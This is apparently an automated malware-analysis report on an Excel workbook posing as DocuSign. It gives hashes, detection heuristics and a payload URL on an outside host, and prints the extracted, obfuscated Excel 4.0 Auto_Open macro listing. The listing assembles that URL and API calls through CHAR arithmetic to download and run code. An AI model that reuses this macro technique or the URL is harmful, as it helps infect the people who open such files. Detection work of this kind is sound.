Malicious Office (OLE) / .XLSX — malware analysis report

Static analysis result for SHA-256 97e55015811632eb…

MALICIOUS

Office (OLE) / .XLSX

Size: 332.0 KB
Created: 2006-09-16 00:00:00
Authoring application: Microsoft Excel
MD5: 85e551e5f6f5013a3317addb3356404b
SHA-1: 4d11c7895cdbfc7c08965e9ed7797394bbef5225
SHA-256: 97e55015811632eba98b97401613f9b61efd49612ffd8050084283eb343fb0d2
Risk Score: 302

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic for Applications
  • T1204.002 Malicious File

The file contains Excel 4.0 (XLM) macros, specifically an Auto_Open entry that uses dangerous formula APIs such as RUN and ShellExecute, indicating the macro is designed to execute arbitrary commands. The embedded URL likely points to a malicious payload that the macro attempts to download and run. The ClamAV detection name 'Doc.Downloader.Docusign0521-9864805-0' further supports the downloader functionality.

Heuristics (7)

  • ClamAV: Doc.Downloader.Docusign0521-9864805-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Docusign0521-9864805-0
  • Excel 4.0 Auto_Open defined name [critical] OLE_XLM_AUTOOPEN_DEFINEDNAME
    oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
  • XLM Auto_Open with dangerous formula APIs [critical] OLE_XLM_DANGEROUS_FN
    Excel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
  • URL reconstructed from XLM cell array (1 URL) [critical] OLE_XLM_CELL_ARRAY_URL
    Excel 4.0 macro sheet stages its payload URL across the BIFF8 Shared String Table (one quoted-char SST entry concatenated with & at runtime), across individual numeric cells (one ASCII charcode per cell), or split across multi-char fragment cells that a download formula concatenates by reference (=A1&A2&… / CONCATENATE(...)). The reconstructed URL is invisible to literal-bytes URL extraction because it is never contiguous in the workbook stream. URLs were recovered by walking the BIFF8 record stream and decoding SST entries, LABELSST/RK/NUMBER cells, and FORMULA cell-reference concatenation in token order.
  • Reference to ShellExecute API [high] SC_STR_SHELLEXEC
    Reference to ShellExecute API
  • Excel 4.0 (XLM) macro sheet present [medium] OLE_XLM_AUTOOPEN
    Workbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: https://dashboard.imadeit.com.ng/ds/151120.gif (referenced by macro)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: xlm_macros.txt
SHA-256: 4d5531650e0faf8764ddd7b14e6947143c32308cbf699d36f8845764b3b4560a
Kind: xlm-macro
Source: oletools.olevba.extract_all_macros (XLM macro listing)
Size: 5603 bytes

Preview (first 1,000 lines of the extracted script):
' 0085     16 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible -  DocuSig
' 0085     18 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible -    8 
' 0085     18 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible -    8 
' 0085     18 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible -    8 
' 0018     23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d  DocuSig!A50 
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' Sheet,Reference,Formula,Value
'    8 ,A94,RUN(B104),""
'    8 ,B104,RUN(A203),""
'    8 ,B200,"https://"&C201&D202&E203,""
'    8 ,A203,"CALL("K"&   8 !CC261,"C"&   8 !R134,"JCJ",   8 !BH172,0)",""
'    8 ,A204,"CALL("K"&   8 !CJ205,"C"&   8 !R168,"JCJ",   8 !BH172&   8 !BH187,0)",""
'    8 ,A205,"CALL("U"&   8 !CJ233,"U"&   8 !BO262,"JJCCJJ",0,B200,   8 !BH172&   8 !BH187&   8 !BH201,0,0)",""
'    8 ,A206,"CALL(   8 !X152,   8 !X165,"JJCCCCJ",0,   8 !BX227,   8 !BH172&   8 !BH187&   8 !BH201,,0,0)",""
'    8 ,A207,HALT(),""
'    8 ,EA233,"CONCATENATE(EA235,EA236,EA237,EA238,EA239,EA240,EA241,EA242,EA243,EA244,EA245,EA246,EA247,EA248,EA249)",""
'    8 ,EA234,[],""
'    8 ,EA235,[],""
'    8 ,EA236,[],""
'    8 ,EA237,[],""
'    8 ,EA238,[],""
'    8 ,EA239,[],""
'    8 ,EA240,[],""
'    8 ,EA241,[],""
'    8 ,EA242,[],""
'    8 ,EA243,[],""
'    8 ,EA244,[],""
'    8 ,EA245,[],""
'    8 ,EA246,[],""
'    8 ,EA247,[],""
'    8 ,EA248,[],""
'    8 ,EA249,[],""
'    8 ,EG251,CONCATENATE(EG252&EG253&EG254&EG255&EG256&EG257&EG258),""
'    8 ,EG252,CHAR(EH252+EI252+EJ252),""
'    8 ,EG253,CHAR(EH253+EI253+EJ253),""
'    8 ,EG254,CHAR(EH254+EI254+EJ254),""
'    8 ,EG255,CHAR(EH255+EI255+EJ255),""
'    8 ,EG256,CHAR(EH256-EI256-EJ256),""
'    8 ,EG257,CHAR(EH257-EI257-EJ257),""
'    8 ,EG258,CHAR(EH258-EI258-EJ258),""
'    8 ,EG264,CONCATENATE(EG265&EG266&EG267&EG268&EG269&EG270&EG271&EG272&EG273&EG274&EG275&EG276&EG277),""
'    8 ,EG265,CHAR(EH265+EI265+EJ265),""
'    8 ,EG266,CHAR(EH266+EI266+EJ266),""
'    8 ,EA267,"CONCATENATE(EA269,EA270,EA271,EA272,EA273,EA274,EA275,EA276,EA277,EA278,EA279,EA280,EA281,EA282,EA283)",""
'    8 ,EG267,CHAR(EH267+EI267+EJ267),""
'    8 ,EA268,CHAR(EB268+EC268+ED268),""
'    8 ,EG268,CHAR(EH268-EI268-EJ268),""
'    8 ,EA269,CHAR(EB269+EC269+ED269),""
'    8 ,EG269,CHAR(EH269-EI269-EJ269),""
'    8 ,EA270,CHAR(EB270+EC270+ED270),""
'    8 ,EG270,CHAR(EH270-EI270-EJ270),""
'    8 ,EA271,CHAR(EB271+EC271+ED271),""
'    8 ,EG271,CHAR(EH271-EI271-EJ271),""
'    8 ,EQ271,"CONCATENATE(EQ272,EQ273,EQ274,EQ275,EQ276,EQ277,EQ278,EQ279,EQ280)",""
'    8 ,EA272,CHAR(EB272-EC272-ED272),""
'    8 ,EG272,CHAR(EH272-EI272+EJ272),""
'    8 ,EQ272,CHAR(ER272+ES272+ET272),""
'    8 ,EA273,CHAR(EB273-EC273-ED273),""
'    8 ,EG273,CHAR(EH273-EI273+EJ273),""
'    8 ,EQ273,CHAR(ER273+ES273+ET273),""
'    8 ,EA274,CHAR(EB274-EC274-ED274),""
'    8 ,EG274,CHAR(EH274-EI274+EJ274),""
'    8 ,EQ274,CHAR(ER274+ES274+ET274),""
'    8 ,EA275,CHAR(EB275-EC275-ED275),""
'    8 ,EG275,CHAR(EH275+EI275-EJ275),""
'    8 ,EQ275,CHAR(ER275+ES275-ET275),""
'    8 ,EA276,CHAR(EB276+EC276-ED276),""
'    8 ,EG276,CHAR(EH276+EI276-EJ276),""
'    8 ,EQ276,CHAR(ER276+ES276-ET276),""
'    8 ,EA277,CHAR(EB277+EC277-ED277),""
'    8 ,EG277,CHAR(EH277+EI277-EJ277),""
'    8 ,EQ277,CHAR(ER277+ES277-ET277),""
'    8 ,EA278,CHAR(EB278+EC278-ED278),""
'    8 ,EQ278,CHAR(ER278-ES278+ET278),""
'    8 ,EA279,CHAR(EB279+EC279-ED279),""
'    8 ,EQ279,CHAR(ER279-ES279+ET279),""
'    8 ,EA280,CHAR(EB280-EC280+ED280),""
'    8 ,EQ280,CHAR(ER280-ES280+ET280),""
'    8 ,EA281,CHAR(EB281-EC281+ED281),""
'    8 ,EA282,CHAR(EB282-EC282+ED282),""
'    8 ,EA283,CHAR(EB283-EC283+ED283),""
'    8 ,EQ286,"CONCATENATE(EQ287,EQ288,EQ289,EQ290,EQ291,EQ292,EQ293)",""
'    8 ,EQ287,CHAR(ER287-ES287-ET287),""
'    8 ,EQ288,CHAR(ER288-ES288-ET288),""
'    8 ,EQ289,CHAR(ER289-ES289-ET289),""
'    8 ,EQ290,CHAR(ER290-ES290+ET290),""
'    8 ,EQ291,CHAR(ER291-ES291+ET291),""
'    8 ,EQ292,CHAR(ER292-ES292+ET292),""
'    8 ,EQ293,CHAR(ER293-ES293+ET293),""
'    8 ,EQ300,"CONCATENATE(EQ301,EQ302,EQ303,EQ304,EQ305,EQ306,EQ307,EQ308,EQ309,EQ310,EQ311,EQ312,EQ313)",""
'    8 ,EQ301,[],""
'    8 ,EQ302,[],""
'    8 ,EQ303,[],""
'    8 ,EQ304,[],""
'    8 ,EQ305,[],""
'    8 ,EQ306,[],""
'    8 ,EQ307,[],""
'    8 ,EQ308,[],""
'    8 ,EQ309,[],""
'    8 ,EQ310,[],""
'    8 ,EQ311,[],""
'    8 ,EQ312,[],""
'    8 ,EQ313,[],""